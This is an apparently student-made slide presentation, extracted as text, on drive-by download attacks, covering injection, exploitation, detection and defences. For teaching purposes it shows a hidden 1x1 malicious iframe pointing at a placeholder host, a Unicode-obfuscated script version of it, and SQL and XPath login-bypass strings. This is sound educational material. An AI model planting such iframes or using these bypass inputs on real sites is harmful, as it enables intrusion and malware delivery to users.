Drive by downloads-cns

1

Drive-By Downloads

Presenter: Darakhshan Naz

Teacher: Professor Dr. Muhammad Mubashir Khan

04.05.2013

2

Agenda

Introduction Mechanisms of Drive-by DownloadGeneral Detection ApproachSecurity MeasuresAssessment & Conclusion

3

What is Drive-by Download?

A technique that involves◦ Intended downloads without understanding

consequenes E.g. Executables

◦ Unintended downloads E.g. Virus, spyware

Can happen by:◦ Visiting a website ◦ Viewing an email message

Installs malicious program, termed as Malwares◦ Through Malwares, attacker gets full or partial

control of victim‘s system

INTRODUCTION

4

(2) Read email

Contains a website link

(3) Attract user‘s interest

User Click Website has many links

(5) Surf every site but getting bored (no interest develop)

Close website

User

Attacker

(6) Sends user a spoofed Email

User‘s browser

(7) Attacker sends malicious code and exploit vulnerability

(8) Malicious code creates connection between user and attacker

(9) Download and install its backdoor Program(10) Steal all user‘s important files and make him compromised over network

Example - Scenario

Drive – By Download !

Source of Concept : Report- Defence against Drive-by Download by National Security Agency US

INTRODUCTION

User is completely unaware of attack

(4) Go to website(1) Open Browser

5

Purpose of Drive-by Download

• Provide gateway to botnets.• Take advantages of vulnerabilities. • Steal personal or confidential information of

user.• Leads or redirects user to other malicious

websites and make him compromised.

INTRODUCTION

6

Mechanisms of Drive-by Download

Basic Concept of Drive-by Download Attack (Source: [1])

1 2

43

Injection

Exploitation

7

InjectionWhat is Injection :

◦ The act of entering data into application by bypassing security controls and change its behaviour in unexpected way.

Reason of Injection :◦ Existance of vulnerabilities.

Drive-by Download initates by the injection of malicious code in database, application or server.

Ways of Malicious code injection:◦ Injection through iFrames ◦ SQL Injection◦ XPATH Injection

MECHANISMS OF DRIVE-BY DOWNLOAD

8

How and where to Inject ?

Source : http://www.malware-info.com/mal_faq_inject.html


• SQL Injection• Xpath Injection

Injection through iFrames

Malware placed directly on Webserver

9

Injection through iFrames The most basic form of injected code is a

malicious iFrame such as: Example:

<div style=visibility: hidden; position: absolute: 1; top:1> <iframe id=IFRAME name=IFRAME

src= http://www.example.com/page_with_malware.htm

scrolling= no width=1 height=1 vspace=0

hspace=0 frameborder=0>

</iframe>

</div>

This iFrame is present in the HTML of a requested web page

Content from this source render in an invisible 1 pixel x 1 pixel window.

Sometimes, iFrames present in encoded form that seems normal. The process of encoding is known as "obfuscation“.


10

Obfuscation The process of disguising code through encoding. The previous iFrame can be converted to a

JavaScript Unicode string using any encoding tool.

Encoding tool: http://www.auditmypc.com/html-encoder.asp

On browsing of injected page, the JavaScript dynamically generates an iframe.

This causes malicious content from a website controlled by an attacker to execute inside the requested web page.


http://www.auditmypc.com/html-encoder.asp

http://www.auditmypc.com/html-encoder.asp

11

Obfuscation Obfuscated form of iFrame is :

<script type="text/javascript">document.write('\u003C\u0064\u0069\u0076\u0020\u0073\u0074\u0079\u006C\u0065\u003D\u0076\u0069\u0073\u0069\u0062\u0069\u006C\u0069\u0074\u0079\u003A\u0020\u0068\u0069\u0064\u0064\u0065\u006E\u003B\u0020\u0070\u006F\u0073\u0069\u0074\u0069\u006F\u006E\u003A\u0020\u0061\u0062\u0073\u006F\u006C\u0075\u0074\u0065\u003A\u0020\u0031\u003B\u0020\u0074\u006F\u0070\u003A\u0031\u003E\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u003C\u0069\u0066\u0072\u0061\u006D\u0065\u0020\u0069\u0064\u003D\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0049\u0046\u0052\u0041\u004D\u0045\u000D\u0020\u0020\u0020\u0073\u0072\u0063\u003D\u0020\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0065\u0078\u0061\u006D\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0070\u0061\u0067\u0065\u005F\u0077\u0069\u0074\u0068\u005F\u006D\u0061\u006C\u0077\u0061\u0072\u0065\u002E\u0068\u0074\u006D\u000D\u0020\u0020\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0020\u006E\u006F\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0031\u0020\u0076\u0073\u0070\u0061\u0063\u0065\u003D\u0030\u000D\u0020\u0020\u0020\u0020\u0068\u0073\u0070\u0061\u0063\u0065\u003D\u0030\u0020\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0030\u003E\u000D\u003C\u002F\u0069\u0066\u0072\u0061\u006D\u0065\u003E\u000D\u003C\u002F\u0064\u0069\u0076\u003E\u000D\u000D');</script>


SQL Injection Bypass the authentication process. Provide access of data to malicious user or

attacker. Example : In any userForm page if we enter

Username: 'or‘1‘=‘1 and Password: 'or‘1‘=‘1

then webpage will execute this query form

SELECT * FROM Users

WHERE Username=`1' OR `1' = `1‘

AND Password = `1' OR `1' = `1‘

Parameters have always logical true condition

Authentication process is validated and attacker can get access to any account in database.

12


13

XPATH InjectionAlmost similar to SQL Injection.Now “target“ is XML Document. Insecurity caused by the injection of XPATH

query or conditions through webpage.Example :

◦ If any user has an account in any site with Username=John and Password = test123, then logically he will see his account only.

• If same user enters his username like John' or 1 = 1 with same password then system will authenticate him and show the entire XML document to him.


14

Mechanism of Drive-by Download

Basic Concept of Drive-by Download Attack (Source: [1])

1 2

43

Injection

Exploitation

15

Exploitation What is Exploitation :

◦ The act by an attacker to perform activities on victim‘s system on his own wish after getting full or partial control.

Reason of Exploitation:◦ Ignore the updating of installed applications.◦ According to Secunia PSI, about 95.46% users have one or

more insecure applications.◦ Newer version may correct one or more vulnerabilities in

the installed application.

Vulnerabilities that are mostly exploited :◦ Browser Vulnerability.◦ Plugin Vulnerability.◦ File Format Vulnerability.


16

Types of VulnerabilitiesBrowser Vulnerability

◦ Attacker injects malicious code into user‘s browser and changes its setting without his knowledge.

Plugin Vulnerability◦ Plugin is provided by third parties that can be

vulnerable; may lead to buffer overflows, memory corruption issues and pointer overwrites.

File Format Vulnerability◦ Attackers attach malware to Word, Excel or PDF

files, distributed through email or websites. Exploit will occur when editing program opens them.

17

General Detection Approach Javascript-script based malwares seems difficult

to detect and analyze. Requires a comprehensive approach to detect

both root cause and dynamic behaviour. Specialized Detection Methods:

◦ CUJO[2] Static + Dynamic analysis of Javascript Detection through machine learning

◦ ARROW[8]. Create Regular Expression Signatures for servers of MDN. Evaluate their effectiveness.

Here the generalized detection approach will be discussed which is the basic idea to detect.

18

Step1: Analysis of JS Redirection

For an effective detection approach, analysis of

JavaScript is mandatory.

• User is victimized in two ways: • Either he may directly expose to vulnerable site.

• Or an attacker reaches to him through a series of redirections.

Two approaches can be taken to investigate redirections.◦ Implementing some settings into JavaScript code

(e.g: document.location).◦ Taking Browser‘s history.

GENERAL DETECTION APPROACH

19

Step2: JavaScript Deobfuscation

Most of the malicious JavaScript is in obfuscated (encoded) form.

Deobfuscation (conversion from complex form to simple form) can help to identify malicious code.

It is possible through manually or any automated tool.

Automated Tools : e.g:◦ Development Tool in Google Chrome.◦ Microsoft Script Debugger or Editor.


20

Step3: Detection of Memory Corruption Most attacks corrupt the memory.

Attacker tries to enter into browser and run his shellcode.◦ A shellcode is a small code through which attacker

gets control of victim‘s system.

• Attacker then uses JavaScript to allocate large number of strings for the shellcode.

• These strings are not the part of real code but for memory allocation by the attacker.

• Detection of these strings can give the indication of shellcode.


21

Contd.Detection of these strings can be done

through two ways:

◦ Controlling and maintaining of string variables whenever they are created.

◦ For automated detection, libemu library is used. It searches from each character and when it finds a

sequence of valid instructions, it reports shellcode.


22

Step4: Investigation of Exploitation

Exploitation is last step of Drive-by Download attack that take advantage of vulnerabilities.

It can be detected through two ways :◦ Analysis of behaviours of Browsers and Plug-ins ◦ Monitoring of string passing as parameters and

method calls. Usually long strings are used in exploits and certain methods are called in malware downloading.


23

Security MeasuresUpdation of softwares. Installation of web-filtering softwares. Implementation of BLADE(Block All Drive-by

Download Exploits).Proper management by Network

Administrators.Users should be careful while visiting sites

specially entertainment and social sites as they may have Adversaries.

Usage of reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.

Usage of Virtual Machine for Web Browsing.

24

The Good

Automated techniques (compiler or library) of deobfuscation is really helpful for the identification of malicious JavaScript.

Detection should be focussed on central points. ◦ Evilseed[11] provides a crawling approach focussing on

central points of Malware.

Machine Learning can provide light weight Javascript analysis, fast detection mechanisms and handling of vulnerabilities in runtime.

Proper input validations can reduce SQL and XPATH injection.

ASSESSMENT & CONCLUSION

25

The BadCan easily happen but very hard to

overcome.

Possibilities of attack are rapidly increasing but validity of detection approaches is not possible every time.

Defensive approach is better to fight against these attacks because of two reasons :◦ Intense Dynamic behaviour.◦ Complex and time consuming detection

approaches.


26

The Ugly

Mostly show unexpected behaviour.

Due to diversity of different ways of attack, it has high ratio of victims and it is difficult to design a detection approach that covers all possibilities.

Not any computing device seems to be safe from Drive-by Download.

As Drive-by Download attack is increasing enormously, perhaps in near future, hard drives or portable device vulnerabilities may also exist.


27

Thanks for your attention

28

References(1)[1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009).

[2] Rieck, K., Krueger, T., Dewald, A.: CUJO-Ecient Detection and Prevention of Drive-by Download Attacks, Tecnische Universitaet Berlin.

[3] Stone-Gross, B., Cova M. , Kruegel, C. , Vigna, G.: Peering through the iFrame University of California, University of Birmingham.

[4] Westervelt, R.: Kaspersky website hacked (February 2009).

[5] Cova, M. , Kruegel, C., Vigna G.: Detection and Analysis of Drive-by-Download Attacks andMalicious Javascript Code University of California, Santa Barbara From ACM digital library.

[6] Interesting statistics from the Secunia PSI (January 2008) http://secunia.com/blog/18.

29

References(2)[7] Luy, L., Yegneswaranz, V., Porrasz, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware Infections College of Computing, Georgia Institute of Technology, SRI International From ACM digital library.

[8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W. : ARROW: Generating Signatures to Detect Drive-By Downloads Georgia Institute of Technology, Microsoft Bing, Microsoft Research

[9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers Indian Institute of Technology, Guwahati, India.

[10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.: All your Iframes point to us Google Inc., Johns Hopkins University.

[11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P., M., Kruegel, C., Vigna,G.:EVILSEED: A Guided Approach to Finding MaliciousWeb Pages, 2012 IEEE Symposium on Security and Privacy

Drive by downloads-cns

Technology

reason of injection

malicious user

injection ofmalicious

mechanism of drive

purpose of drive

download initates

download attack source

malicious content